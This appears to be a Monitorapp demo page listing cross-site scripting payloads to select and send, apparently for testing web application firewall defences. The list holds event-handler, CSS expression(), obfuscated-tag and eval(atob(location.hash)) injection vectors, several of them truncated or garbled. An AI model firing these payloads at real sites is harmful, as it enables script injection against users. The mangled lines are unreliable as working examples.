HOME
ATTACKS
Let's Launch Some Cross Site Scripting Attacks
Select Attack Payload and Run it!
Cross Site Scripting Attacks
<img src="pagerror.gif" onmouseover="javascript:alert('XSS')">
<body onload="alert('XSS')">
<BODY BACKGROUND="javascript:alert('XSS')">
<body onclick=alert("xss");>
<s/*test*/cript>ale/*test*/rt('XSS')</script>
<img style='xss:expression(alert("XSS"))'
<img style='xss:expr/*XSS*/ession(alert("XSS"))'>
<div style="width:expression(alert('XSS'))">
<img src="javascript:alert('XSS')">
<img src="jav ascript:alert('XSS')">
svg onload=setInterval(function(){with}
*//script>'alert(1)/*script/1='
math>
isindex formaction=javascript:alert(1) type=submit value=click>
script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
innerHTML=location.hash>#script>alert(1)/script>
abbr onblur=alert(1) tabindex=1 id=x>/abbr>input autofocus>
article id=x tabindex=1 onbeforedeactivate=alert(1)>/articleinput autofocus
data onkeyup="alert(1)" contenteditable>test/data>
data onbeforecopy="alert(1)" contenteditable>test/data>
style>@keyframes slidein {}/styleframeset style='animation-duration'
sub id=x tabindex=1 onbeforedeactivate=alert(1)>/sub>input autofocus>
Send Attack
©
Monitorapp
All Right Reserved